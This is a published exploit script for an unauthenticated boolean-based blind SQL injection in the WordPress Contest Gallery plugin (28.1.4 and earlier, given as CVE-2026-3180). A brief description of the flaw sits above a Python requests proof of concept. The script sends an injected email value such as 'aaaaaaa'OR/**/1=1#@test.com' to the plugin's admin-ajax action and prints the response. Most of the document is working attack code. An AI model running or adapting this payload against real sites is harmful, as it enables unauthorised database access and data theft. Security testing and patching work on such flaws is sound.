📄 WordPress Contest Gallery 28.1.4 SQL Injection

# Exploit Title: WordPress Contest Gallery 28.1.4 - Unauthenticated Blind SQL Injection
    # Tested on: Docker - PHP 8.2/Apache + MariaDB (WordPress Environment)
    # CVE: 2026-3180
    
    
    """
    Description
    
    A Blind SQL Injection vulnerability exists in Contest Gallery versions 28.1.4 and earlier. The issue is caused by the unsafe use of the cgl_maili parameter, where sanitize_email() preserves the single quote (') character in the local part of an email address. As a result, user-controlled input reaches wpdb->get_row() without proper parameterization via prepare(), allowing unauthenticated attackers to perform boolean-based blind SQL injection.
    Authentication Required: No
    
    """
    
    
    import requests
    import json
    
    NONCE = " "
    URL = "http://localhost:8080/wp-admin/admin-ajax.php"
    endpoint = "/wp-admin/admin-ajax.php"
    url = "http://localhost:8080/"
    payload = "'OR/**/1=1#@test.com' and 'OR/**/1=2#@test.com"
    
    def send_payload(mail):
        data = {
            "action": "post_cg1l_resend_unconfirmed_mail_frontend",
            "cgl_mail": mail,
            "cgl_page_id": "1",
            "cgl_activation_key": "",
            "cg_nonce": NONCE,
        }
        return requests.post(URL, data=data)
    
    r_true = send_payload("aaaaaaa'OR/**/1=1#@test.com")
    
    if r_true.status_code == 200:
        status_code = r_true.status_code
            
    
    banner = f"""
    CVE : 2026-3180 | Contest Gallery 28.1.4 : Boolean SQLi
    
    payload :........................{payload}
    end point :........................{endpoint}
    url :..............................{url}
    status :...........................{status_code}
    nonce :............................{NONCE}
    """
    
    print(banner)
    print(f"Body length: {len(r_true.text)} chars")